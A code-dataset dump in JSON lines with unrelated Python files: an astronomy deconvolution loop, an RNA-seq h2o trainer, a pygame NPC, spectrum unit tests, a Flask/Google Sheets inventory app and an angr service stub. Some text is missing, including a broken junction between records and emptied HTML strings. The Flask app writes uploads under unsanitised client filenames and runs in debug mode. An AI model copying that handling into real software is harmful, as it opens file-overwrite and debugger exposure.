3:\n assert mask.shape == (1, nx, ny)\n mask = lambda x: mask * x\n else:\n raise ValueError\n except:\n raise ValueError(\"Mask has incorrect shape\")\n\n # PSF operator\n psfo = PSF(psf, nthreads=nthreads, imsize=residual.shape, mask=mask, beam=beam)\n residual = beam(mask(residual))\n if model.any():\n dirty = residual + psfo.convolve(model)\n else:\n dirty = residual\n\n # wavelet dictionary\n if psi_basis is None:\n psi = DaskPSI(imsize=residual.shape, nlevels=psi_levels, nthreads=nthreads)\n else:\n if not isinstance(psi_basis, list):\n psi_basis = [psi_basis]\n psi = DaskPSI(imsize=residual.shape, nlevels=psi_levels, nthreads=nthreads, bases=psi_basis)\n \n # l21 weights and dual \n if weights21 is None:\n print(\" Initialising all l21 weights to unity.\")\n weights21 = np.ones((psi.nbasis, psi.nmax), dtype=residual.dtype)\n if dual is None:\n dual = np.zeros((psi.nbasis, nband, psi.nmax), dtype=residual.dtype)\n\n # l21 reweighting\n if reweight_iters is not None:\n reweight_iters = list(reweight_iters)\n else:\n reweight_iters = []\n \n # residual\n residual_mfs = np.sum(residual, axis=0)\n rms = np.std(residual_mfs)\n rmax = np.abs(residual_mfs).max()\n \n # preconditioning operator\n def hess(x): \n return psfo.convolve(x) + x / (sigma_frac*rmax) \n\n if tidy:\n # spectral norm\n posthess = hess\n beta, betavec = power_method(hess, residual.shape, tol=pmtol, maxit=pmmaxit, verbosity=pmverbose)\n else:\n posthess = lambda x: x\n beta = 1.0\n betavec = 1.0\n\n # deconvolve\n for i in range(0, maxit):\n M = lambda x: x * (sigma_frac*rmax) # preconditioner\n x = pcg(hess, residual, np.zeros(residual.shape, dtype=residual.dtype), M=M, tol=cgtol,\n maxit=cgmaxit, minit=cgminit, verbosity=cgverbose)\n \n # update model\n modelp = model\n model = modelp + gamma * x\n model, dual = primal_dual(posthess, model, modelp, dual, sig_21, psi, weights21, beta,\n tol=pdtol, maxit=pdmaxit, report_freq=25, mask=mask, verbosity=pdverbose,\n positivity=positivity)\n\n # reweighting\n if i in reweight_iters:\n l2_norm = np.linalg.norm(dual, axis=1)\n for m in range(psi.nbasis):\n indnz = l2_norm[m].nonzero()\n alpha = np.percentile(l2_norm[m, indnz].flatten(), reweight_alpha_percent)\n alpha = np.maximum(alpha, 1e-8) # hardcode minimum\n weights21[m] = alpha/(l2_norm[m] + alpha)\n reweight_alpha_percent *= reweight_alpha_ff\n\n # get residual\n residual = -grad_func(model, dirty, psfo)\n \n # check stopping criteria\n residual_mfs = np.sum(residual, axis=0)\n rmax = np.abs(residual_mfs).max()\n rms = np.std(residual_mfs)\n eps = np.linalg.norm(model - modelp)/np.linalg.norm(model)\n\n print(\" SARA - At iteration %i peak of residual is %f, rms is %f, current eps is %f\" % (i+1, rmax, rms, eps))\n\n if eps < tol:\n print(\" SARA - Success, convergence after %i iterations\" %(i+1))\n break\n\n if tidy and i2}:{:0>2}:{:05.2f}\".format(int(hours), int(minutes), seconds))\n\n\nif __name__ == \"__main__\":\n\n # candidates\n run_three = {}\n # run_three[\"ERR188345Aligned.sortedByCoord.out\"] = 163\n # run_three[\"ERR188453Aligned.sortedByCoord.out\"] = 163\n # run_three[\"ERR188479Aligned.sortedByCoord.out\"] = 203\n run_three[\"SRR5968867_s\"] = 123\n run_three[\"SRR5959996_s\"] = 214\n run_three[\"SRR5968940_s\"] = 175\n\n # loop all candidates\n for file_name, readlength in run_three.items():\n print(file_name, str(readlength))\n\n total_time_start = time.time()\n\n # parameters\n\n ### scRNA seq\n # file_name = \"SRR5968905_s\"\n # dir = \"bwa_scRNA\"\n # RNASEQ = \"/data/zhendi/wei/\" + dir + \"/seq/\" + file_name + \".rds\"\n\n ### RNA seq\n # file_name = \"ERR188288Aligned.sortedByCoord.out\"\n # readlength = 205\n seq = \"bwa_scRNA\" # \"star_RNAseq\"\n root = \"/data/zhendi/wei\"\n RNASEQ = os.path.join(root, seq, \"seq\", file_name + \".rds\")\n models = [\"GLM\"] # , \"RF\", \"XGB\", \"DL\"]\n labels = [\"count_5\", \"count_overlap\"]\n\n # load data\n start = time.time()\n pandas2ri.activate()\n readRDS = robjects.r[\"readRDS\"]\n mydf = readRDS(RNASEQ)\n mydf = mydf.sample(frac=0.01, replace=True, random_state=1)\n mydf.rename(\n columns={\n \"fitpar..i...count\": \"count_5\",\n \"fitpar..i...count_overlap\": \"count_overlap\",\n },\n inplace=True,\n )\n mydf = mydf.reset_index()\n mydf = mydf.astype(\"int32\")\n end = time.time()\n\n # paths\n # seq_path: RNAseq or scRNAseq\n seq_path = os.path.join(root, \"GC\", seq) # '/data/zhendi/wei/GC/star_RNAseq/'\n print(\"seq_path: \", seq_path)\n if not os.path.exists(seq_path):\n os.mkdir(seq_path)\n\n # save_path: which sample\n save_path = os.path.join(\n seq_path, file_name\n ) # '/data/zhendi/wei/baseline/star_RNAseq/ERR188021Aligned.sortedByCoord.out\n print(\"save_path: \", save_path)\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n all_path = {}\n all_path[\"seq_path\"] = seq_path\n all_path[\"save_path\"] = save_path\n\n # init h2o\n h2o.init(ip=\"localhost\", port=54321, nthreads=15)\n\n # training\n for label in labels:\n # paths\n # label_path: modeling count_5 or count_overlap\n label_path = os.path.join(\n save_path, label\n ) # '/data/zhendi/wei/baseline/star_RNAseq/ERR188021Aligned.sortedByCoord.out/count_5\n print(\"label_path: \", label_path)\n if not os.path.exists(label_path):\n os.mkdir(label_path)\n\n # data_path: tuple of (X, y, train)\n data_path = os.path.join(\n label_path, \"data\"\n ) # '/data/zhendi/wei/baseline/star_RNAseq/ERR188021Aligned.sortedByCoord.out/count_5/data\n print(\"data_path: \", data_path)\n if not os.path.exists(data_path):\n os.mkdir(data_path)\n\n all_path[\"label_path\"] = label_path\n all_path[\"data_path\"] = data_path\n\n # get data\n print(\"Getting training data:\")\n X, y, train = get_model_data(all_path, mydf, label)\n\n for model in models:\n\n # path\n # model_path: GLM, RF, XGB, DL, saving estimator, metrics, and labels\n model_path = os.path.join(label_path, model)\n print(\"model_path: \", model_path)\n if not os.path.exists(model_path):\n os.mkdir(model_path)\n\n all_path[\"model_path\"] = model_path\n\n # training\n print(\"Training: Label: \" + label + \" Model: \" + model)\n training(all_path, model, X, y, train, label)\n\n # total time\n total_time_end = time.time()\n timer(total_time_start, total_time_end)\n\n # shutdown h2o\n h2o.shutdown()\n","sub_path":"02_baseline/h2o_GC_baseline.py","file_name":"h2o_GC_baseline.py","file_ext":"py","file_size_in_byte":11513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"313204948","text":"import pygame\nimport math\nimport components.mehdi as mehdi\nimport components.flame as flame\n\nclass npc:\n\n def __init__(self, image, rect, statement):\n self.image = image\n self.collide = self.imageRect = rect\n self.statement = []\n\n for s in statement.split():\n if mehdi.dialog[s][\"singleTrigger\"]:\n if s not in flame.master_user['dialogCompleted']:\n self.statement.append([mehdi.dialog[s], s])\n else:\n pass\n else:\n self.statement.append([mehdi.dialog[s], s])\n\n def interact(self, player):\n if math.hypot(player.playerRect.center[0] - self.collide.center[0], player.playerRect.center[1] - self.collide.center[1]) < 150:\n newdialog = []\n currentdialog = []\n for dialog in self.statement:\n currentdialog.append(dialog[0]['dialog'])\n if dialog[0][\"singleTrigger\"]:\n flame.master_user['dialogCompleted'].append(dialog[1])\n else:\n newdialog.append(dialog)\n\n self.statement = newdialog\n return currentdialog\n\n else:\n return False\n\n def draw(self, surface, player):\n if self.imageRect.colliderect(player.screenRect):\n surface.blit(self.image, (self.imageRect.x - player.cam_x, self.imageRect.y - player.cam_y))\n","sub_path":"components/npc.py","file_name":"npc.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"194727386","text":"from __future__ import print_function, absolute_import, \\\n division, unicode_literals\nimport os\nimport pytest\nfrom astropy import units as u\nimport numpy as np\n\nfrom linetools.spectra import io\nfrom linetools.spectra.xspectrum1d import XSpectrum1D\nfrom linetools.spectra import utils as ltsu\n\n\n@pytest.fixture\ndef spec():\n return io.readspec(data_path('UM184_nF.fits'))\n\n\n@pytest.fixture\ndef spec2():\n return io.readspec(data_path('PH957_f.fits'))\n\n\n@pytest.fixture\ndef specm(spec,spec2):\n specm = ltsu.collate([spec,spec2])\n return specm\n\n\ndef data_path(filename):\n data_dir = os.path.join(os.path.dirname(__file__), 'files')\n return os.path.join(data_dir, filename)\n\n\ndef test_collate(spec,spec2):\n coll_spec = ltsu.collate([spec,spec2])\n assert coll_spec.nspec == 2\n assert coll_spec.totpix == 20379\n\n\ndef test_rebin_to_rest(spec,spec2):\n zarr = np.array([2.1,2.2])\n # Build spectra array\n coll_spec = ltsu.collate([spec,spec2])\n rest_spec = ltsu.rebin_to_rest(coll_spec, zarr, 100*u.km/u.s, debug=False)\n # Test\n assert rest_spec.totpix == 3716\n np.testing.assert_allclose(rest_spec.wvmin.value, 986.3506403, rtol=1e-5)\n\n\ndef test_smash_spectra(spec,spec2):\n # Try to stack 2 spectra with different wavelengths\n coll_spec = ltsu.collate([spec,spec2])\n with pytest.raises(AssertionError):\n stack = ltsu.smash_spectra(coll_spec)\n # Stack rebinned\n zarr = np.array([2.1,2.2])\n rest_spec = ltsu.rebin_to_rest(coll_spec, zarr, 100*u.km/u.s, debug=False)\n stack = ltsu.smash_spectra(rest_spec, method='average')\n # Test\n assert stack.totpix == 3716\n np.testing.assert_allclose(stack.flux[1].value, -3.3213510, rtol=1e-5)\n\n\ndef test_airtovac_andback(spec):\n npix = 1000\n spec = XSpectrum1D.from_tuple((np.linspace(5000.,6000,npix), np.ones(npix)))\n # Airtovac\n spec.meta['airvac'] = 'air'\n spec.airtovac()\n # Test\n np.testing.assert_allclose(spec.wavelength[0].value, 5001.394869990007, rtol=1e-5)\n assert spec.meta['airvac'] == 'vac'\n # Vactoair\n spec.vactoair()\n np.testing.assert_allclose(spec.wavelength[0].value, 5000., rtol=1e-5)\n assert spec.meta['airvac'] == 'air'\n\n\ndef test_rebin(spec, specm):\n # Rebin\n new_wv = np.arange(3000., 9000., 5) * u.AA\n newspec = spec.rebin(new_wv)\n # Test\n np.testing.assert_allclose(newspec.flux[1000], 0.9999280967617779)\n assert newspec.flux.unit is u.dimensionless_unscaled\n # With sigma\n newspec = spec.rebin(new_wv, do_sig=True)\n imn = np.argmin(np.abs(newspec.wavelength-8055*u.AA))\n np.testing.assert_allclose(newspec.sig[imn].value, 0.0169634, rtol=1e-5)\n # With NANs\n spec.data['flux'][spec.select][100:110] = np.nan\n newspec = spec.rebin(new_wv)\n np.testing.assert_allclose(newspec.flux[1000], 0.9999280967617779)\n # All\n spec2 = specm.rebin(new_wv, all=True)\n np.testing.assert_allclose(spec2.wvmax.value, 8995.0)\n\n\ndef test_addnoise(spec):\n #\n newspec = spec.add_noise(seed=12)\n np.testing.assert_allclose(newspec.flux[1000].value, 0.6003435, rtol=1e-5)\n\n # With S/N input\n newspec2 = spec.add_noise(seed=19,s2n=10.)\n np.testing.assert_allclose(newspec2.flux[1000].value, -0.130012, rtol=1e-5)\n\n\ndef test_box_smooth(spec):\n # Smooth\n newspec3 = spec.box_smooth(3)\n np.testing.assert_allclose(newspec3.flux[4000], 0.9650185, rtol=1e-5)\n assert newspec3.flux.unit == u.dimensionless_unscaled\n\n newspec5 = spec.box_smooth(5)\n np.testing.assert_allclose(newspec5.flux[3000], 1.0405008,rtol=1e-5)\n # Preserve\n newspec5p = spec.box_smooth(5, preserve=True)\n\n\ndef test_gauss_smooth(spec):\n # Smooth\n smth_spec = spec.gauss_smooth(4.)\n # Test\n np.testing.assert_allclose(smth_spec.flux[3000].value, 0.749937, rtol=1e-5)\n assert smth_spec.flux.unit == spec.flux.unit\n\n\ndef test_ivar_smooth(spec):\n # Smooth\n smth_spec = spec.ivar_smooth(4)\n # Test\n np.testing.assert_allclose(smth_spec.flux[3000].value, 0.7220675349235535, rtol=1e-5)\n assert smth_spec.flux.unit == spec.flux.unit\n\n\ndef test_rebintwo(spec):\n # Add units\n funit = u.erg/u.s/u.cm**2\n spec.units['flux'] = funit\n # Rebin\n new_wv = np.arange(3000., 9000., 5) * u.AA\n newspec = spec.rebin(new_wv, do_sig=True)\n # Test\n np.testing.assert_allclose(newspec.flux[1000].value, 0.992559, rtol=1e-5)\n assert newspec.flux.unit == funit\n # Without sig\n spec_nosig = XSpectrum1D.from_tuple((spec.wavelength, spec.flux))\n newspec = spec.rebin(new_wv)\n assert newspec.sig_is_set is False\n\n\ndef test_relvel(spec):\n\n # Velocity\n velo = spec.relative_vel(5000.*u.AA)\n # Test\n np.testing.assert_allclose(velo[6600].value, -2322.625, rtol=1e-5)\n assert velo.unit == (u.km/u.s)\n\n\ndef test_splice_two(spec, spec2):\n spec3 = ltsu.splice_two(spec, spec2)\n assert spec3.npix == 18390\n\n\ndef test_stitch(specm):\n spec = specm.stitch()\n assert spec.npix == 18390\n\n\ndef test_copy(spec):\n # From existing\n spec2 = spec.copy()\n assert spec.wavelength[0] == spec2.wavelength[0]\n assert spec.flux[-1] == spec2.flux[-1]\n #\n wave = np.arange(3000., 6500)\n npix = len(wave)\n spect = XSpectrum1D.from_tuple((wave*u.AA,np.ones(npix)))\n specf = spect.copy()\n assert specf.sig_is_set is False\n\n\ndef test_plot(spec):\n spec.plot(show=False)\n\n\ndef test_continuum_utils(spec):\n # define continuum in a non-interactive way...\n n = len(spec.wavelength.value)\n contpoints = [(spec.wavelength.value[i], 1.) for i in range(n)[::int(n/100)]]\n spec.meta['contpoints'] = contpoints\n xy = np.array(spec.meta['contpoints'])\n xy = xy.transpose()\n x, y = xy[0], xy[1]\n # test interpolate\n spec.normalize(spec._interp_continuum(x, y, spec.wavelength.value))\n np.testing.assert_allclose(spec.co, 1.)\n co_old = spec.co\n # test perturb\n spec.perturb_continuum(rel_var=0.05, seed=2)\n assert all(co_old != spec.co)\n np.testing.assert_allclose(np.max(spec.co), 1.11636, rtol=1e-5)\n np.testing.assert_allclose(np.min(spec.co), 0.8658872, rtol=1e-5)\n\n #test reset\n spec.reset_continuum()\n np.testing.assert_allclose(spec.co, 1.)\n\n # Test generation of normalized spec\n norm_spec = spec.normalized_spec()\n assert isinstance(norm_spec, XSpectrum1D)\n assert norm_spec.normed is False\n\n # test normalize/unnormalize\n flux_old = spec.flux\n spec.unnormalize()\n assert spec.normed is False\n np.testing.assert_allclose(spec.flux,flux_old)\n\n\ndef test_assignment(spec):\n temp = np.arange(1, spec.npix + 1)\n spec.wavelength = temp * u.m\n assert spec.wavelength[0] == temp[0] * u.m\n unit = u.erg / u.s / u.cm**2 / u.AA\n spec.flux = temp * unit\n assert spec.flux[0] == temp[0] * unit\n spec.sig = temp\n assert spec.sig[0] == temp[0] * unit\n spec.co = temp\n assert spec.co[0] == temp[0] * unit\n\n\ndef test_wvmnx():\n npix = 1000\n # Without sig\n spec = XSpectrum1D.from_tuple((np.linspace(5000.,6000,npix), np.ones(npix)))\n assert spec.wvmin.value == 5000.\n assert spec.wvmax.value == 6000.\n # With sig\n spec = XSpectrum1D.from_tuple((np.linspace(5000.,6000,npix), np.ones(npix),\n np.ones(npix)*0.1))\n assert spec.wvmin.value == 5000.\n assert spec.wvmax.value == 6000.\n\n","sub_path":"linetools/spectra/tests/test_xspec_utils.py","file_name":"test_xspec_utils.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"350296092","text":"\nfrom flask import Flask, request, render_template\nfrom unidecode import unidecode\nimport gspread\nimport datetime\nimport os\n\n#Conexão com a Planilha\nconexao = gspread.service_account()\nplanilha = conexao.open(\"Nature Saboaria\").sheet1\ntransacoes = conexao.open(\"transacoes\").sheet1\n\n#Aplicação:\n#A variável root_path você deve modificar com o caminho completo da pasta python no seu sistema, serve para o Flask achar a pasta templates corretamente ^^\n#O app.config define a pasta padrão onde as imagens mandadas no form devem serem salvas!\napp = Flask(\"Estoque-SIM-SA\", root_path=\"/home/lucas/Desktop/estoque-sim-sa/Controle de estoque/python\")\napp.config['UPLOAD_FOLDER'] = '/home/lucas/Desktop/estoque-sim-sa/Controle de estoque/python/static'\n#app = Flask(\"Estoque-SIM-SA\", root_path=\"C:\\\\Users\\\\luqui\\\\OneDrive\\\\Área de Trabalho\\\\estoque-sim-sa\\\\Controle de estoque\\\\python\")\n#app.config['UPLOAD_FOLDER'] = 'C:\\\\Users\\\\luqui\\\\OneDrive\\\\Área de Trabalho\\\\estoque-sim-sa\\\\Controle de estoque\\\\python\\\\python'\n#app = Flask(\"Estoque-SIM-SA\", root_path=\"/home/rafael/Área de Trabalho/Controle de estoque/estoque-sim-sa/Controle de estoque/python\")\n#app.config[\"UPLOAD_FOLDER\"] = \"/home/rafael/Área de Trabalho/Controle de estoque/estoque-sim-sa/Controle de estoque/static\"\n#app = Flask(\"Estoque-SIM-SA\", root_path=\"H:\\\\Users\\\\agata\\\\Documents\\\\projeto trainee\\\\estoque-sim-sa\\\\Controle de estoque\\\\python\")\n#app = Flask(\"Estoque-SIM-SA\", root_path=\"C:\\\\Users\\\\tanko\\\\estoque-sim-sa\\\\Controle de estoque\\\\python\")\n#app.config[\"UPLOAD_FOLDER\"] = \"C:\\\\Users\\\\tanko\\\\estoque-sim-sa\\\\Controle de estoque\\\\python\\\\static\"\n\n@app.route(\"/\")\ndef main():\n #Pegando os toda a planilha de transações\n tudo = transacoes.get_all_values()\n\n #Criando uma Dicionário com todas as transações do DIA e já juntando as que tiverem repetidas em uma só, somando as quantidades\n dia = {}\n for transacao in tudo:\n if int(transacao[5]) == datetime.datetime.today().day:\n try:\n dia[unidecode(transacao[0]).lower()] += int(transacao[1])\n except:\n dia[unidecode(transacao[0]).lower()] = int(transacao[1])\n #Ordenando o dicionário pelo produto de maior quantidade:\n dia = sorted(dia.items(), key=lambda transacao: transacao[1], reverse=True)\n if dia == []:\n dia.append([\"Não houve nenhuma transação hoje\", 1])\n\n #Criando uma Dicionário com todas as transações do MÊS e já juntando as que tiverem repetidas em uma só, somando as quantidades\n mes = {}\n for transacao in tudo:\n if int(transacao[6]) == datetime.datetime.today().month:\n try:\n mes[unidecode(transacao[0]).lower()] += int(transacao[1])\n except:\n mes[unidecode(transacao[0]).lower()] = int(transacao[1])\n #Ordenando o dicionário pelo produto de maior quantidade:\n mes = sorted(mes.items(), key=lambda transacao: transacao[1], reverse=True)\n if mes == []:\n mes.append([\"Não houve nenhuma transação esse mês\", 1])\n \n #Criando uma Dicionário com todas as transações do ANO e já juntando as que tiverem repetidas em uma só, somando as quantidades\n ano = {}\n for transacao in tudo:\n if int(transacao[7]) == datetime.datetime.today().year:\n try:\n ano[unidecode(transacao[0]).lower()] += int(transacao[1])\n except:\n ano[unidecode(transacao[0]).lower()] = int(transacao[1])\n #Ordenando o dicionário pelo produto de maior quantidade:\n ano = sorted(ano.items(), key=lambda transacao: transacao[1], reverse=True)\n if ano == []:\n ano.append([\"Não houve nenhuma transação esse ano\", 1])\n\n return render_template(\"home.html\", diaQuantidade = dia, mesQuantidade = mes, anoQuantidade = ano)\n\n#Roteamento para remover um produto\n@app.route(\"/remover\", methods=[\"POST\"])\ndef deleteProduto():\n #Pesquisa o nome enviado na planilha\n remover = planilha.find(request.form.get(\"delete\"))\n\n #Faz a remoção do produto e avalia se a exclusão foi bem sucedida ou não\n if planilha.delete_rows(remover.row):\n return u\"\"\"\n \n \"\"\"\n else:\n return u\"\"\"\n \n \"\"\"\n\n#Roteamento para remover uma transação\n@app.route(\"/deleteTransacao\", methods=[\"POST\"])\ndef deleteTransacao():\n #Faz a remoção da transação e avalia se a exclusão foi bem sucedida ou não\n rm = transacoes.find(request.form.get(\"transacao\"))\n if transacoes.delete_rows(rm.row):\n return u\"\"\"\n \n \"\"\"\n else:\n return u\"\"\"\n \n \"\"\"\n\n\n# Captura qual é o item que irá ser retirada uma determinada quantidade, e exibe o popup\n@app.route('/popup', methods=['POST'])\ndef popup():\n item = planilha.find(request.form.get('item'))\n img = planilha.cell(item.row, 6)\n return render_template('popup.html',\n planilha_completa = planilha.get_all_values(),\n nome = item.value,\n imagem = img.value,\n quantidade = planilha.cell(item.row, 2).value,\n preço = planilha.cell(item.row, 3).value\n )\n\n# Roteamento para remover uma quantidade de um produto, caso a quantidade do produto fique abaixo do limite, ele dispara um alerta\n@app.route(\"/venda\", methods=[\"POST\"])\ndef venda():\n # Procura o Produto\n rm = planilha.find(request.form.get('nome'))\n\n if(int(request.form.get(\"quantidade\")) < 0 or int(request.form.get(\"quantidade\")) > int(planilha.cell(rm.row, 2).value) or request.form.get('quantidade') == ''):\n return u'''\n \n '''\n else:\n dateToday = datetime.datetime.today()\n #Registra uma transação na planilha transações com o valor do produto, a quantidade, o preço, data e o horário\n transacoes.append_row([request.form.get(\"nome\"), request.form.get(\"quantidade\"), str(float(request.form.get(\"preço\")) * int(request.form.get(\"quantidade\"))), str(dateToday.day) + \"/\" + str(dateToday.month) + \"/\" + str(dateToday.year), str(dateToday.hour) + \":\" + str(dateToday.minute) + \":\" + str(dateToday.second), str(dateToday.day), str(dateToday.month), str(dateToday.year)])\n\n #Atualiza a célula com o valor da subtração do valor que já tem na célula com o valor que o usuário quer retirar\n planilha.update_cell(rm.row, 2, int(planilha.cell(rm.row, 2).value) - int(request.form.get(\"quantidade\")))\n\n # Verifica se a quantidade atual está abaixo do valor limite definido pelo usuário (por enquanto o limite é fixo kkkkk)\n if int(planilha.cell(rm.row, 2).value) < 5:\n return render_template(\"respostaEstoque.html\", retorno = \"Operação concluida, o total da venda foi de R$: \" + str(round(int(request.form.get(\"quantidade\")) * float(request.form.get(\"preço\")), 1)) + \"! Atenção! O produto está abaixo do limite especificado\")\n\n else:\n return render_template(\"respostaEstoque.html\", retorno = \"Operação concluida, o total da venda foi de R$: \" + str(round(int(request.form.get(\"quantidade\")) * float(request.form.get(\"preço\")), 1)) + \"!\")\n\n# Rotas para editar dados da planilha\n@app.route('/popupEdition', methods=['POST'])\ndef popupEdition():\n item = planilha.find(request.form.get('edit'))\n volume = planilha.cell(item.row, 4).value\n\n # Utilizando o laço for para capturar apenas o valor do volume\n valor = ''\n for num in volume:\n if num.isnumeric() == True:\n valor += num\n\n return render_template('editar.html',\n planilha_completa = planilha.get_all_values(),\n nome = item.value,\n quantidade = planilha.cell(item.row, 2).value,\n preço = planilha.cell(item.row, 3).value,\n volume = volume,\n valor = valor,\n corpo = planilha.cell(item.row, 5).value,\n imagem = planilha.cell(item.row, 6).value\n )\n\n# Nessa rota ocorrerá a edição dos itens\n@app.route('/editar', methods=['POST'])\ndef editar():\n conteudo = [\n 'nome',\n 'quantidade',\n 'preço',\n 'valor',\n 'área do corpo',\n 'imagem'\n ]\n\n # Capturando a linha certa pelo nome do item\n linha = planilha.find(request.form.get('edition')).row\n\n # Atualizando a planilha com os novos valores\n for pos, item in enumerate(conteudo):\n if pos == 3:\n volume = request.form.get(item) + request.form.get('volume')\n planilha.update_cell(linha, pos + 1, volume)\n elif pos == 5:\n if request.files['imagem'].filename != '':\n request.files['imagem'].save(os.path.join(app.config['UPLOAD_FOLDER'], request.files['imagem'].filename))\n planilha.update_cell(linha, pos + 1, request.files['imagem'].filename)\n else:\n pass\n else:\n planilha.update_cell(linha, pos + 1, request.form.get(item))\n\n return u'''\n \n '''\n\n# Rotas para Inserir Produto\n@app.route('/inserir')\ndef inserir():\n return render_template(\"incluirProduto.html\")\n\n# Rota de Captura das Informações para adicionar na planilha\n@app.route('/recebendo_dados', methods=['POST'])\ndef add():\n arr = [\n 'nome', \n 'quantidade', \n 'preço',\n 'valor',\n 'área do corpo',\n 'imagem'\n ]\n # Laço For para adicionar os dados dentro da minha lista row.\n row = []\n for pos, n in enumerate(arr):\n item = request.form.get(n)\n if pos == 3:\n item = request.form.get(n) + request.form.get('volume')\n if pos == 5:\n if request.files[\"imagem\"].filename != \"\":\n request.files[\"imagem\"].save(os.path.join(app.config[\"UPLOAD_FOLDER\"], request.files[\"imagem\"].filename))\n item = request.files[\"imagem\"].filename\n else:\n pass\n row.append(item)\n \n # Laço For para verificar se os dados que o usuários inseriu é compatível com alguma linha dentro da planilha;\n # Caso seja compatível, ele apenas irá alterar a quantidade adicionada.\n same = contsame = 0\n for pos, linha in enumerate(planilha.get_all_values()): # Array de linhas\n for cell in range(0, 6):\n if linha[cell] == linha[1] or linha[cell] == linha[2] or linha[cell] == linha[5]:\n continue\n elif unidecode(linha[cell]).lower().strip() == unidecode(row[cell]).lower().strip():\n same += 1\n \n # Caso seja igual a 4, significa dizer que as 4 colunas de uma linha eram iguais aos dados que o usuário inseriu;\n # Então quer dizer que a linha já existe na planilha, portanto, o produto não será adicionado.\n if same == 3:\n contsame += 1\n return u\"\"\"\n \n \"\"\"\n else:\n same = 0\n \n # contsame == 0 significa que não há nenhum item na planilha igual ao inserido pelo usuário, logo, será um novo item\n if contsame == 0:\n index = len(planilha.get_all_values()) + 1\n planilha.insert_row(row, index)\n return u\"\"\"\n \n \"\"\"\n\n@app.route('/estoque')\ndef estoque():\n return render_template('estoque.html', planilha_completa = planilha.get_all_values())\n\n@app.route('/transacoes')\ndef transacoess():\n return render_template(\"transacoes.html\", transacoes = reversed(transacoes.get_all_values()))\n\n@app.route(\"/pesquisa\", methods=['POST'])\ndef pesquisa():\n pesq = []\n for produto in planilha.get_all_values():\n if unidecode(request.form.get(\"produto\")).lower().strip() in unidecode(produto[0]).lower().strip():\n pesq.append(produto)\n if pesq != []:\n return render_template(\"estoque.html\", planilha_completa = pesq)\n return u\"\"\"\n \n \"\"\" \n \n\n@app.route(\"/sobre\")\ndef sobre():\n return render_template(\"sobre.html\")\n \n\napp.run(debug=True, use_reloader=True)","sub_path":"Controle de estoque/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"176514557","text":"from angr_helper.angr_proj import AngrProj\nfrom angr_helper.function_parse import FunctionParse\nfrom angr_helper.fw_entry_state import FwEntryState\nfrom utils.db.mongodb.file_cache_dao import FileCacheDAO\n\n\nclass FilesService:\n\n @staticmethod\n def bin_state_info(file_id):\n # 查找是否已有缓存结果,如有,不再做重复解析,直接返回缓存结果\n state_dict = FileCacheDAO.fetch_state_info(file_id)\n if state_dict is not None:\n return state_dict\n\n # 通过 project 快速解析文件\n angr_proj = AngrProj(file_id)\n\n # 从 project 中取 entry 对象\n entry_state = FwEntryState(angr_proj)\n\n # 读取状态机信息\n state_dict = entry_state.entry_info()\n\n # 在数据库中缓存解析结果\n FileCacheDAO.save_state_info(file_id, state_dict)\n\n return state_dict\n\n @staticmethod\n def functions_list(file_id):\n # 查找是否已有缓存结果,如有,不再做重复解析,直接返回缓存结果\n funcs_list = FileCacheDAO.fetch_functions(file_id)\n if funcs_list is not None:\n return funcs_list\n else:\n return []\n\n # # 通过 project 快速解析文件\n # angr_proj = AngrProj(file_id)\n # funcs_list = FunctionParse.functions_extract(angr_proj.proj)\n\n # 在数据库中缓存解析结果\n # FileCacheDAO.save_functions(file_id, funcs_list)\n\n # return funcs_list\n","sub_path":"fw_analyze/service/files_service.py","file_name":"files_service.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"183836159","text":"# cs215 ; Unit 1: A Social Network Magic Trick ; 15\n# counting steps in naive as a function of a\n\ndef naive(a, b):\n x = a\n y = b\n z = 0\n while x > 0:\n z = z + y\n x = x - 1\n return z\n\ndef time(a):\n # The number of steps it takes to execute naive(a, b)\n # as a function of a\n steps = 0\n # your code here\n return steps","sub_path":"cs215/Unit 1 A Social Network Magic Trick/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"245876744","text":"from myimports import *\nfrom split_training_testing import *\n#---------------------------------------------------------------------------------------\n# input_pipeline(filename, path): prepares a batch of features and labels for training\n#\n# parameters: filename - the file to be batched into the model\n# path - the folder where filename resides\n#\n# returns: feature_batch - a batch of features to train or test on\n# label_batch - a batch of labels related to the feature_batch\n#\n#---------------------------------------------------------------------------------------\ndef input_pipeline(filename, path):\n\n preprocessed_tz_scans = []\n feature_batch = []\n label_batch = []\n \n #Load a batch of preprocessed tz scans\n preprocessed_tz_scans = np.load(os.path.join(path, filename))\n \n #Shuffle to randomize for input into the model\n np.random.shuffle(preprocessed_tz_scans)\n \n # separate features and labels\n for example_list in preprocessed_tz_scans:\n for example in example_list:\n feature_batch.append(example[0])\n label_batch.append(example[1])\n \n feature_batch = np.asarray(feature_batch, dtype=np.float32)\n label_batch = np.asarray(label_batch, dtype=np.float32)\n \n return feature_batch, label_batch\n''' \n# unit test ------------------------------------------------------------------------\ntrain_set, test_set = get_train_test_file_list()\nprint ('Train Set -----------------------------')\nfor f_in in train_set:\n print(\"In train set:{0}\".format(f_in))\n feature_batch, label_batch = input_pipeline(f_in, PREPROCESSED_DATA_FOLDER)\n print (' -> features shape {}:{}:{}'.format(len(feature_batch), \n len(feature_batch[0]), \n len(feature_batch[0][0])))\n print (' -> labels shape {}:{}'.format(len(label_batch), len(label_batch[0])))\n \nprint ('Test Set -----------------------------')\nfor f_in in test_set:\n print(\"In test set:{0}\".format(f_in))\n feature_batch, label_batch = input_pipeline(f_in, PREPROCESSED_DATA_FOLDER)\n print (' -> features shape {}:{}:{}'.format(len(feature_batch), \n len(feature_batch[0]), \n len(feature_batch[0][0])))\n print (' -> labels shape {}:{}'.format(len(label_batch), len(label_batch[0])))\n'''\n#feature_batch, label_batch = 